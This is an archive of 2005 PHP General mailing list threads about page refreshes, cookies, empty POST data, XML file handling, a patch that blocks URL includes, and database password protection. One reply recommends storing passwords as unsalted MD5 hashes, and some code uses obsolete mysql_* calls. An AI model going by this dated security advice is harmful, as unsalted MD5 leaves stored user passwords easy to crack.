Re: [PHP] auto refresh once
On Wed, 2005-03-02 at 01:55, William Stokes wrote: Hello, Is it possible to force one automatic refresh browser when user enters to a webpage? If so, how? javascript timer and a reload in a function called vi body onLoad wouldd do it I guess. if you are only going to do it once you need to not write the javascript the second time through so you will have to keep track of whether this is the first time or not. HTH Bret -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] auto refresh once
Hi Will, Automatic refresh can be achieved by the use of a META tag. The meta tag looks like the following, where the 5 is the number of seconds, the URL is obviously the page. meta http-equiv=REFRESH CONTENT=5; URL=http://www.url.com/; To refresh all you do is send the META tag out as part of the output the first time and dont do it the second time. So the first time you call the page use a variable in request such as ?refresh=true and only output the META tag if refresh in the $_REQUEST array is set to true. Hope this helps Devraj William Stokes wrote: Hello, Is it possible to force one automatic refresh browser when user enters to a webpage? If so, how? Thanks -Will -- Devraj Mukherjee ([EMAIL PROTECTED]) Eternity Technologies Pty. Ltd. ACN 107 600 975 P O Box 5949 Wagga Wagga NSW 2650 Australia Voice: +61-2-69717131 / Fax: +61-2-69251039 http://www.eternitytechnologies.com/ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] auto refresh once
I can't guess your purpose, but may be you can do it like this.
function refreshByOnce()
{
$isVisit = isset($_SESSION['isVisit'])?$_SESSION['isVisit']:false;
If (!$isVisit)
{
$_SESSION['isVisit'] = true;
Header('Location:http://yourdomain.com');
Exit;
}
}
But unfortunately this will give your server more press, since you must use
session here. So if your site have a very huge visits, pls be careful.
Best regards,
Yang Shiqi
-Original Message-
From: William Stokes [mailto:[EMAIL PROTECTED]
Sent: Wednesday, March 02, 2005 3:55 PM
To: php-general@lists.php.net
Subject: [PHP] auto refresh once
Hello,
Is it possible to force one automatic refresh browser when user enters to a
webpage? If so, how?
Thanks
-Will
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] auto refresh once
William Stokes wrote: Hello, Is it possible to force one automatic refresh browser when user enters to a webpage? If so, how? Use the header() function. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Setting cookie on first visit
I am using a cookie to detect what skin a user wants to display. The
problem is if a user visits the site for the first time the cookie is
not being set. I am detecting if its being set or not with
if(!isset($_COOKIE['skin'])){ ... }
It's not setting the cookie untill a user refreshes the page once. How
can I ensure it's set when it hasnt been set before?
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] _POST not working (using mini_httpd) - 2 attachments
[EMAIL PROTECTED] (Richard Lynch) wrote in news:[EMAIL PROTECTED]: overbored wrote: Hi all, I'm learning PHP and I'd need to create a simple Web-based ifconfig tool for a Soekris box (running Pebble). However, I've been unsuccessful at getting PHP working with mini_httpd. In particular, the POST data is not being received. Here's what I did... First, I applied (only) the SCRIPT_FILENAME and index.php modifications to mini_httpd.c, as suggested in: http://m0n0.ch/wall/list/?action=show_msgactionargs[]=15actionargs[] =11 Then I built installed this on a (regular) Debian box, which had php4 installed from apt. (This doesn't seem related, but for some reason, when I start up, I get a warning: socket: Address family not supported by protocol.) This is probably about IP6 -- at least if it's durring boot-up. What are the lines immediately before/after that? If they say anything about IP6, you're almost for sure okay. That just means some software isn't ready for IP6 and some is -- Which is pretty much the current state of the industry. There are no lines before/after that; it's the only output I see. Next, I created some simple PHP files, and I found that POST data isn't getting through at all. Googling didn't really turn up much, and I know this is possible because the m0n0wall project does just this (download their rootfs and look at the PHP files under /usr/local/www). Basically, _POST/_GET/_REQUEST never exist, and it seems the only way I can get the data is with GET and parsing the HTTP_ENV_VARS. If it's older PHP, try $HTTP_POST_VARS and $HTTP_GET_VARS and so on. I have PHP 4.3.10-2. If you see test.php, I did have a test for $HTTP_POST_VARS in there. I just added a similar test for $HTTP_GET_VARS, and it also prints nothing. Other than that, I'd have to say double-check the settings of mini_httpd -- and try a mini_httpd mailing list. PHP doesn't really *do* a whole lot with the GET/POST data from the server. It's kinda just there or not there for PHP to work with... Not saying PHP isn't maybe looking in the wrong place for where mini_httpd wants to send it, but I think that's all spelled out in the CGI standard. Yes, the PHP Module and all other Modules conform to the CGI standard -- that's how they work. It's just that CGI got appropriated over time to mean something other whan what it actually meant originally, and, well, there it is. PS Don't send attachments. Put 'em on-line and send URLs. Sorry. I was actually told to do the opposite once, when I provided URLs. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Setting cookie on first visit
When the user first visits your site, there is no skin in your cookie. Then
you can give a default value. And after the user modifies his/her profile,
you can set it to the cookie. So I don't think it is a problem of setting
cookie.
Best regards,
Yang Shiqi
-Original Message-
From: Tom Whitbread [mailto:[EMAIL PROTECTED]
Sent: Wednesday, March 02, 2005 5:18 PM
To: php-general lists
Subject: [PHP] Setting cookie on first visit
I am using a cookie to detect what skin a user wants to display. The
problem is if a user visits the site for the first time the cookie is
not being set. I am detecting if its being set or not with
if(!isset($_COOKIE['skin'])){ ... }
It's not setting the cookie untill a user refreshes the page once. How
can I ensure it's set when it hasnt been set before?
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] PHP slowness
I'm a little bit late in on this one, and asking questions after the problem is solved is a bit academic, but I am curious about one thing - Does the debian package do reverse lookups to try to get a name for the visiting IP address? Every page request taking 5 seconds sounds like a name lookup failure to me. regards Markus On Tuesday 01 March 2005 13:45, Gerard wrote: It looks like you are using Debian and probably did an apt-get install php. Why don't you try compiling php by hand without all the extra crap that I'm sure you don't need then try it. I think you will be much happier. Debian is great software, but when it comes to things like web services and php it is much better to compile by hand to get the best performance. Thanks for that one! After a manual compile it all works fine :D - Gerard -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: Authentication fails
On 3/1/2005 3:52 PM John Swartzentruber wrote: On 3/1/2005 2:12 PM Jason Barnett wrote: John Swartzentruber wrote: Somehow my PHP 5.0.3 or something is configured incorrectly. When I try to get past an authentication input, nothing happens. For example, I have phpMyAdmin configured now to use mysqli, but when I enter the username and password, the screen doesn't change. In previous testing, I saw that an incorrect authentication was detected and reported, but a correct authentication had no affect. Not sure if this is a phpMyAdmin bug or not, but you might try to clear out all cookies that your browser has from john.swartzentruber.us. For that matter you should see if you *have* any cookie set from john.swartzenruber.us. I'm not pointing fingers at phpMyAdmin, but just tossing out a possible solution. My phpinfo() output is at http://john.swartzentruber.us/test.php For example, I'm trying to use a simple file upload script called file thingie that is at http://www.solitude.dk/filethingie/download.php I have edited the original file only to decrease the maximum file size to 500 bytes and limit uploads to text files. I hope no one here tries to be nasty. The user name is USERNAME2 and the password is PASSWORD. Yeah... I wouldn't suggest putting user / pw combos onto the web even if you intend on changing it later. You just never know. Well, if someone can get past the login page, at least someone is making progress :-) Can anyone check this out and give me some clues or things to look into? Is there some setting that would cause _POST data to disappear? How would I go about debugging this? Start by going to the form page's action page (since your test.php page only displays phpinfo() I'm not sure what this is going to be). We'll call this page action.php. I forgot to mention that the page in question was http://john.swartzentruber.us/test.php I'm working on creating an even simpler script, but since I'm not that familiar with either HTML forms or PHP, it is taking some time. In these examples, the action page is the same page as original page (i.e., filethingie.php). When I look at the page source (i.e., the PHP output) in my browser, this is what the form looks like (sorry about the word wrapping): form action=filethingie.php method=post h1Please Login/h1 input type=hidden name=log_lang value=en / div label for=log_userUser: /labelinput type=text size=15 name=log_user id=log_user / /div div label for=log_passPass: /labelinput type=password size=15 name=log_pass id=log_pass / input type=hidden name=action value=login / input type=submit value=login / /div /form The simplest way to debug this (but it's effective) is to var_dump($_POST) at the top of action.php. Insert this at the very top of the page (likely to cause a lot of errors :) and then gradually cut / paste that code throughout the action page. Do this until you narrow down the problem code. Well, I've been trying print_r($_POST), and it is always empty. That's the problem. Since this is a file upload script you are doing you will probably want to var_dump($_FILES) as well. Heck, if you're having *session* problems then you should be looking into the $_SESSION array and (possibly) the $_COOKIE array. I'll try removing the session stuff to see if that is significant. It looks like $_SESSION is also empty, although I do see what appear to be session files created in /tmp, which is where they go. To summarize, it appears that the problem is not with authentication per se, but is that $_POST is empty when the script is called from a form in the same file. I'll try to test this using a different action script and see what happens. In the meantime, if you see anything or have any other ideas, please let me know. I appreciate you taking the time to help. I've got some more information and I hope someone can help me figure out the problem. I changed my original PHP program so that the form action script is a different script. In that file, I just do a var_dump on $_POST and $_SERVER. When I do that, it looks like all of the data comes through correctly. On the other hand, when the form action script is the *same* script that contains the form, when I do the same var_dumps, the data does *not* have any $_POST data. Also, the _SERVER[REQUEST_METHOD] is GET, not POST in this instance. So it appears that my problem is that when I post to the same script I am running, things don't work. I still have no idea why this would be the case. Does anyone have any ideas? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: Authentication fails
I've got some more information and I hope someone can help me figure out the problem. I changed my original PHP program so that the form action script is a different script. In that file, I just do a var_dump on $_POST and $_SERVER. When I do that, it looks like all of the data comes through correctly. Super. On the other hand, when the form action script is the *same* script that contains the form, when I do the same var_dumps, the data does *not* have any $_POST data. Also, the _SERVER[REQUEST_METHOD] is GET, not POST in this instance. My suspicion was that this was what had happened as well, but *why* your POST is being interpreted as a GET is unclear to me. I did notice that you were sending GET variables when you had a login error... but someone more knowledgeable than I (Richard?) will likely come along and explain how / why PHP can interpret a form with both POST and GET variables as a GET script. So it appears that my problem is that when I post to the same script I am running, things don't work. I still have no idea why this would be the case. Does anyone have any ideas? One other thing I noticed, but didn't quite understand. Your apache2handler shows you are using port 0, but your SERVER_PORT is 80. I don't understand the Apache side of things well enough to untangle that one either. -- Teach a man to fish... NEW? | http://www.catb.org/~esr/faqs/smart-questions.html STFA | http://marc.theaimsgroup.com/?l=php-generalw=2 STFM | http://php.net/manual/en/index.php STFW | http://www.google.com/search?q=php LAZY | http://mycroft.mozdev.org/download.html?name=PHPsubmitform=Find+search+plugins signature.asc Description: OpenPGP digital signature
[PHP] Re: patch to php 4.3.10 to disabling URL wrappers in include like statements
Tom Z. Meinlschmidt wrote: Hi, I've experienced a lot of attacks in my hosting server due to silly users and their scripts with holes. So I prepared this little patch to 4.3.10, which disables using url wrappers in include/include_once/require/require_once statemens (switchable in php.ini). See readme.security from patch patch is there: http://orin.meinlschmidt.org/~znouza/php_patch.txt comments are welcome /tom http://php.net/manual/en/ini.php#ini.list allow_url_fopen = 0 -- Teach a man to fish... NEW? | http://www.catb.org/~esr/faqs/smart-questions.html STFA | http://marc.theaimsgroup.com/?l=php-generalw=2 STFM | http://php.net/manual/en/index.php STFW | http://www.google.com/search?q=php LAZY | http://mycroft.mozdev.org/download.html?name=PHPsubmitform=Find+search+plugins signature.asc Description: OpenPGP digital signature
[PHP] Delete last 15 chars from a file
Hi, I am trying to create an XML file, it will be done in stages so if the file isn't present I will add the line: ?xml version=1.0 ? root_element Then for each line I add I add the following child_elementdatachild_element But for various reasons the application won't know when the file is complete so it won't have the final: /root_element To solve this I intend to add the following each time child_elementdatachild_element /root_element and delete the /root_element every time I add a new child_elementdatachild_element. Can anyone tell me how I can delete the last 15 characters from a file every time I open the file? Thanks for your help -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Spam and this list
On Tue, 01 Mar 2005 11:11:47 -0500, bob [EMAIL PROTECTED] wrote: Well, this time it took just 11 days to get my first bit of spam from this mailing list. Do you mean the spam was from php-general@lists.php.net ? Or do you mean that you know for sure that your address was harvested from this list? I've not noticed getting any extra spam since joining, personally. Don't forget that: a) Emails you send to this list may be forwarded elsewhere, with your address included b) The email address you use for this list may have been 'brute-forced' c) Some malicious oik may have posted your address somewhere else world-readable d) You might have accidentally posted it someplace else (eg register for access to our forums, we promise not to use it for blah blah blah, please tick a box, etc, etc). -- AdamT Justify my text? I'm sorry, but it has no excuse. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] [NEWBIE] How to allow for a href tags but no others? [SOLVED]
Alberto, Thank you for your explanation and your example code. I think this is how I am going to go forward in allowing my users to input links. Your time in replying is much appreciated. Dave -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] PHP5 DOM - DomDocumentFragments empty
Hi,
I've a Problem with the DOM Extension in PHP5. I simply want to create
a DocumentFragment which can be used in ImportNode for Example. I now
that the code beyond may look a little bit strange, but I've
simplyfied it as much as it was possible.
The Code should print the Contents of the the Fragment which is Part
of the DomDocument. When you run this Code you'll see that the Result
is an empty String.
Does anyone has any Idea is this behaviour is correct, or if this
might be a PHP Bug.
If I'm doing something wrong, could you please tell me what's wrong?
Thank you for your Help.
Regards
Tobias
?php
$xmlData = XMLDATA
?xml version=1.0 encoding=ISO-8859-1 ?
root
subElementcontent/subElement
/root
XMLDATA;
$dom = new DomDocument;
$dom-loadXML( $xmlData );
$dom2 = new DomDocument;
$fragment = $dom2-createDocumentFragment();
foreach( $dom-childNodes AS $node ) {
$newNode = $dom2-importNode( $node, true );
$fragment-appendChild( $newNode );
}
$dom2-appendChild( $fragment );
echo $dom2-saveXML( $fragment );
?
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: sql query
! is a logical NOT operator. It simply turns true = false, and false =
true.
So, what you have is:
$a = true;
if($a) {
echo 'true';
} else {
echo 'false';
}
if(!$a) {
echo 'false!';
} else {
echo 'true!';
}
In these 2 cases, it will echo
true and true!
More info can be found here:
http://www.php.net/manual/en/language.operators.logical.php
William Stokes wrote:
Hello
Can someone explain this to me. I don't know how to read this.
if (!$variable = mysql_query(select id,sessid from users where ...
What is this if(!
I mean the ! sign.
Thanks
-Will
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] patch to php 4.3.10 to disabling URL wrappers in include like statements
Correct me if I'm wrong, but isn't this already available in the standard PHP? In the php.ini file, you can refuse the inclusion of url's : allow_url_fopen = Off I think also Hardened PHP offers additional similar protections. Markus On Wednesday 02 March 2005 08:57, Tom Z. Meinlschmidt wrote: Hi, I've experienced a lot of attacks in my hosting server due to silly users and their scripts with holes. So I prepared this little patch to 4.3.10, which disables using url wrappers in include/include_once/require/require_once statemens (switchable in php.ini). See readme.security from patch patch is there: http://orin.meinlschmidt.org/~znouza/php_patch.txt comments are welcome /tom -- === Tomas Meinlschmidt, SBN3, MCT, MCP, MCP+I, MCSE, NetApp Filer NetCache gPG fp: CB78 76D9 210F 256A ADF4 0B02 BECA D462 66AB 6F56 / $ID: 66AB6F56 GCS d-(?) s: a- C++ ULHISC*$ P+++ L+++$ E--- W+++$ N++(+) !o !K w(---) !O !M V PS+ PE Y+ PGP++ t+@ !5 X? R tv b+ !DI D+ G e+++ h r+++ z+++@ === -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: Delete last 15 chars from a file
Shaun wrote:
Hi,
I am trying to create an XML file, it will be done in stages so if the file
isn't present I will add the line:
?xml version=1.0 ?
root_element
Then for each line I add I add the following
child_elementdatachild_element
But for various reasons the application won't know when the file is complete
so it won't have the final:
/root_element
To solve this I intend to add the following each time
child_elementdatachild_element
/root_element
and delete the /root_element every time I add a new
child_elementdatachild_element. Can anyone tell me how I can delete the
last 15 characters from a file every time I open the file?
Thanks for your help
first of all, why don't you simply do something like:
?php
$contents = file_get_contents('file');
$contents = str_replace('/root_element', '', $contents);
$contents .= child_elementdatachild_element/root_element;
file_put_contents('file', $contents);
?
But well, to strip off the last 15 chars, simply use substr(), thus:
$contents = substr(file_get_contents('file'), 0, -15);
that will return the entire file contents - the last 15 chars.
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] How can I secure database passwords used by PHP
Who are these other webpage maintainers and why do they have access to your PHP source code? This isn't a PHP issue. The MySQL password has to be in a file as plain text; there's no getting around that (as recently discussed on here). Your issue is controlling access to the machine and the files, so is an OS/policy/trust issue, imo. John is right. And from what you say in your response I think that sharing database passwords isn't really the problem. It seems that John's answer was right on - you have an OS/policy/trust issue. If you are trying to limit access to what files the PHP user can read, you might find this message from the archives quite useful... http://marc.theaimsgroup.com/?l=php-generalm=109066460609993w=2 -- Teach a man to fish... NEW? | http://www.catb.org/~esr/faqs/smart-questions.html STFA | http://marc.theaimsgroup.com/?l=php-generalw=2 STFM | http://php.net/manual/en/index.php STFW | http://www.google.com/search?q=php LAZY | http://mycroft.mozdev.org/download.html?name=PHPsubmitform=Find+search+plugins signature.asc Description: OpenPGP digital signature
[PHP] sql query
Hello Can someone explain this to me. I don't know how to read this. if (!$variable = mysql_query(select id,sessid from users where ... What is this if(! I mean the ! sign. Thanks -Will -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] combining values
-Original Message- From: Bret Hughes Sent: 01/03/05 18:43 On Tue, 2005-03-01 at 11:44, Sascha Kaufmann wrote: $birthday = $day.'.'.$month.'.'.$year; why wouldn't $birthday = $day.$month.$year; work as well. --- It would -- which to use is a matter of personal preference. Cheers! Mike To view the terms under which this email is distributed, please go to http://disclaimer.leedsmet.ac.uk/email.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Mistaken Identity - Was: Anti-password trading/sharing solutions
Please note that my name is DAN TAPPIN not DAN TRAINOR [EMAIL PROTECTED]. Although our last names start with the same letter you will note that the following characters and our email addresses are different. Please double check your facts before you open your big fat ranting mouths. Dan Tappin (The list member formerly known as Dan T) Side Note: I could really give a rats-a** if Dan Trainor hosts adult material. If the subjects are of age then get over it. They are adults - they made their choices. There is a little thing here called personal responsibility. Why do some people insist on trying to save everyone from themselves and force morality down everyones throat? On Mar 1, 2005, at 7:36 PM, Rory Browne wrote: Dan I think you could have handled this better. I don't have a problem with your choice of business, provided you aren't exploiting, forcing, or underpaying, your 'content-sources'. On the other hand I resent the way you've spoken to friends of mine. Also from looking through your responses, I note a hint of hypocracy. In future I suggest showing respect, to people who in the communitys view have earned it, until such time as you have built up the credability to do otherwise. Suggestion - figure out what you want, STFW, and if you can't find what you need, get someone to program it. On Tue, 1 Mar 2005 13:53:32 -0700, Dan Tappin [EMAIL PROTECTED] wrote: What about using a simple session database to ensure multiple logins are not allowed. You can create a session, store the session ID in mysql. If the same user tries to login again from a different location i.e. new session ID you can lock them out / log this activity. You really can't prevent the shared password issue unless you billed on a per login basis. The bottom line is that you end up accepting that you grant access to a user you give up controlling the sharing. You can only prevent multiple login's which is pretty good. It really does not matter if two people use the site 12 hours per day or one 24 hours per day. You can track IP's to look for suspected sharing i.e. use ARIN / RIPE look-ups and see if the same user log's in from multiple subnets. I would think that this would be quite easy with PHP and a MySQL type log. Do your best to limit abuse and move on. Dan T -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] How can I secure database passwords used by PHP webpages
The best way is to not store the password at all.
Store a hash of the password like this:
INSERT INTO users SET pass = MD5('password');
Now not knowing how you authenticate those passwords this might not
work.
If it's an internal web page via PHP all you do is MD5 the users
supplied password and compare to you DB.
Dan Tappin (The other Dan T)
On Mar 1, 2005, at 5:09 PM, Rob Tanner wrote:
WE have a number of PHP webpages that access one of several MySql
databases
and while the PHP files that contain the passwords cannot be accessed
via the
web, we are becoming increasingly concerned over the possibility of
other
webpage maintainers viewing those files. How have other folks
protected
database passwords needed by PHP apps?
Thanks.
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: patch to php 4.3.10 to disabling URL wrappers in include like statements
On Wednesday 02 March 2005 22:03, Jason Barnett wrote: Tom Z. Meinlschmidt wrote: which disables using url wrappers in include/include_once/require/require_once statemens (switchable in http://php.net/manual/en/ini.php#ini.list allow_url_fopen = 0 I haven't had a look at the patch in question but from my understanding of the description above, after the application of the patch the filesystem functions (ie fopen and friends) should still be able to use URLs. Effectively it allows finer control over opening URLs. I would like to think that the OP wouldn't go to the trouble of creating a patch (for the latest release of PHP no less) for functionality that already exists! IIRC a request for something similar was made on the list some time ago. -- Jason Wong - Gremlins Associates - www.gremlins.biz Open Source Software Systems Integrators * Web Design Hosting * Internet Intranet Applications Development * -- Search the list archives before you post http://marc.theaimsgroup.com/?l=php-general -- New Year Resolution: Ignore top posted posts -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: Authentication fails
On 3/2/2005 9:22 AM Jason Barnett wrote: On the other hand, when the form action script is the *same* script that contains the form, when I do the same var_dumps, the data does *not* have any $_POST data. Also, the _SERVER[REQUEST_METHOD] is GET, not POST in this instance. My suspicion was that this was what had happened as well, but *why* your POST is being interpreted as a GET is unclear to me. I did notice that you were sending GET variables when you had a login error... but someone more knowledgeable than I (Richard?) will likely come along and explain how / why PHP can interpret a form with both POST and GET variables as a GET script. I don't know, but in this particular case, it shouldn't be significant because I see the problem when there is no error, so the GET variables aren't needed. So it appears that my problem is that when I post to the same script I am running, things don't work. I still have no idea why this would be the case. Does anyone have any ideas? One other thing I noticed, but didn't quite understand. Your apache2handler shows you are using port 0, but your SERVER_PORT is 80. I don't understand the Apache side of things well enough to untangle that one either. That is odd. I use name-based virtual hosting, and I have both an internal and an external address for each VirtualHost, but in all cases, I specify the port to be 80. I don't know why apache2handler would show 0. I guess it is one more thing to google to look for clues. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] php-general-unsubscribe@lists.php.net
- Original Message -
From: yangshiqi [EMAIL PROTECTED]
To: 'Tom Whitbread' [EMAIL PROTECTED]; 'php-general lists'
php-general@lists.php.net
Sent: Wednesday, March 02, 2005 4:36 AM
Subject: RE: [PHP] Setting cookie on first visit
When the user first visits your site, there is no skin in your cookie.
Then
you can give a default value. And after the user modifies his/her profile,
you can set it to the cookie. So I don't think it is a problem of setting
cookie.
Best regards,
Yang Shiqi
-Original Message-
From: Tom Whitbread [mailto:[EMAIL PROTECTED]
Sent: Wednesday, March 02, 2005 5:18 PM
To: php-general lists
Subject: [PHP] Setting cookie on first visit
I am using a cookie to detect what skin a user wants to display. The
problem is if a user visits the site for the first time the cookie is
not being set. I am detecting if its being set or not with
if(!isset($_COOKIE['skin'])){ ... }
It's not setting the cookie untill a user refreshes the page once. How
can I ensure it's set when it hasnt been set before?
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] patch to php 4.3.10 to disabling URL wrappers in include like statements
From system security's standpoint:
?php
$content = file_get_contents('http://www.domain.net/file.inc');
echo $content;
?
is OK, but
?php
include('http://www.domain.net/file.inc');
?
is NOT!
Nice patch, Tom, will probably use it myself too...
regards,
Bostjan
On Wednesday 02 March 2005 11:54, Markus Mayer wrote:
Correct me if I'm wrong, but isn't this already available in the standard
PHP? In the php.ini file, you can refuse the inclusion of url's :
allow_url_fopen = Off
I think also Hardened PHP offers additional similar protections.
Markus
On Wednesday 02 March 2005 08:57, Tom Z. Meinlschmidt wrote:
Hi,
I've experienced a lot of attacks in my hosting server due to silly users
and their scripts with holes. So I prepared this little patch to 4.3.10,
which disables using url wrappers in
include/include_once/require/require_once statemens (switchable in
php.ini). See readme.security from patch
patch is there:
http://orin.meinlschmidt.org/~znouza/php_patch.txt
comments are welcome
/tom
--
=
== Tomas Meinlschmidt, SBN3, MCT, MCP, MCP+I, MCSE, NetApp Filer
NetCache gPG fp: CB78 76D9 210F 256A ADF4 0B02 BECA D462 66AB 6F56 / $ID:
66AB6F56 GCS d-(?) s: a- C++ ULHISC*$ P+++ L+++$ E--- W+++$
N++(+) !o !K w(---) !O !M V PS+ PE Y+ PGP++ t+@ !5 X? R tv b+ !DI D+ G
e+++ h r+++ z+++@
=
==
--
Best regards,
Bostjan Skufca
system administrator
Domenca d.o.o.
Phone: +386 4 5835444
Fax: +386 4 5831999
http://www.domenca.com
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Connecting to a AS/400?
Hello! Is there anyone who has some experience in connecting to a IBM AS/400 server with PHP? Any ideas where to start? Regards, Frank Frank Arensmeier Marketing Support NIKE HYDRAULICS AB Box 1107 631 80 Eskilstuna Sweden tel +46 16 82 34 fax +46 16 13 93 16 email: [EMAIL PROTECTED] www.nikehydraulics.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] combining values
Mike Ford wrote: -Original Message- From: Bret Hughes Sent: 01/03/05 18:43 On Tue, 2005-03-01 at 11:44, Sascha Kaufmann wrote: $birthday = $day.'.'.$month.'.'.$year; why wouldn't $birthday = $day.$month.$year; because it does work aswell work as well. --- It would -- which to use is a matter of personal preference. Cheers! Mike To view the terms under which this email is distributed, please go to http://disclaimer.leedsmet.ac.uk/email.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] sql query
On Wed, 2 Mar 2005 13:02:39 +0200, William Stokes [EMAIL PROTECTED] wrote:
Hello
Can someone explain this to me. I don't know how to read this.
if (!$variable = mysql_query(select id,sessid from users where ...
What is this if(!
This is a way to run a SQL query, capture the return value, and
perform an action if the query failed. For code readability, I would
probably write that as two statements:
$variable = mysql_query(SELECT * FROM blah);
if(!$variable) { error_handler(mysql_error()); }
See the documentation for information on mysql_query return values:
http://us2.php.net/manual/en/function.mysql-query.php
Jason
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] mailserver logfile analyser
Our mailserver writes a logfile every day, but it takes hours to analyse it
manualy.
I (newby) am trying to write a php script that reads the the logfile line by
line and try to get a top 50 of spammers/clients that mail too much...
I can get line by line all information like email-adres, from , to , bytes
send , but how to store it in a array ?
If a line is read and the emailadres already pressent in the array, it
should not ad this emailadress again, but add a counter +1
In the end i want an array containing all emailadreses and how often they
were counted.
This is how far i get: (sorry, it is in Dutch)
It shows all from and to emailadresses. Not bad for a newby, but it took one
week to do.
?php
$fp=;$line=;$aantal=0;
echo TABLE BORDER=3;
echo TRTD ALIGN=\center\ From:/TDTD
ALIGN=\center\To:/TD/TR;
if($fp = fopen(C:\smtp\SMTP-Activity-050226.log,r)) {
while (!feof ($fp)) {
$line = fgets($fp, 4096);
if(strstr($line,SMTP-IN)) {
if(strstr($line,MAIL FROM )) {
$aantal++;
$start=strpos($line,);
$end=strpos($line,);
$from=str_replace(, , str_replace(, ,
substr($line,$start,$end-$start)));
echo TRTD.$from./TD;
}
if(strstr($line,RCPT TO )) {
$start=strpos($line,);
$end=strpos($line,);
echo TD . str_replace(, , str_replace(, ,
substr($line,$start,$end-$start)))./TD;
}
}
}
echo /TR/TABLE;
fclose($fp);
}
echo Totaal aantal: $aantal BR;
?
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Setting cookie on first visit
The manual detail this issue:
http://ca.php.net/setcookie
You can't see the cookie until you hit the next page. There is no way
view the newly set cookie.
Dan Tappin
On Mar 2, 2005, at 2:18 AM, Tom Whitbread wrote:
I am using a cookie to detect what skin a user wants to display. The
problem is if a user visits the site for the first time the cookie is
not being set. I am detecting if its being set or not with
if(!isset($_COOKIE['skin'])){ ... }
It's not setting the cookie untill a user refreshes the page once. How
can I ensure it's set when it hasnt been set before?
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
[suspicious - maybe spam] [PHP] [suspicious - maybe spam] Re: [PHP] Connecting to a AS/400?
You need to clearer on 'connecting to' . Do you mean FTP, MySQL etc??? Dan Tappin On Mar 2, 2005, at 8:54 AM, Frank Arensmeier wrote: Hello! Is there anyone who has some experience in connecting to a IBM AS/400 server with PHP? Any ideas where to start? Regards, Frank Frank Arensmeier Marketing Support NIKE HYDRAULICS AB Box 1107 631 80 Eskilstuna Sweden tel +46 16 82 34 fax +46 16 13 93 16 email: [EMAIL PROTECTED] www.nikehydraulics.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] update of mysql to 4.1
Hi, i'm thinking of updating my mysql-server from 3.23 to 4.1.10, and i can't find any serious information if i would have to rebuild php too. anybody tryed this already?? system: debian linux, apache 1.3.31, php 4.3.9, mysql 3.23.52 thanks peter -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: patch to php 4.3.10 to disabling URL wrappers in include like statements
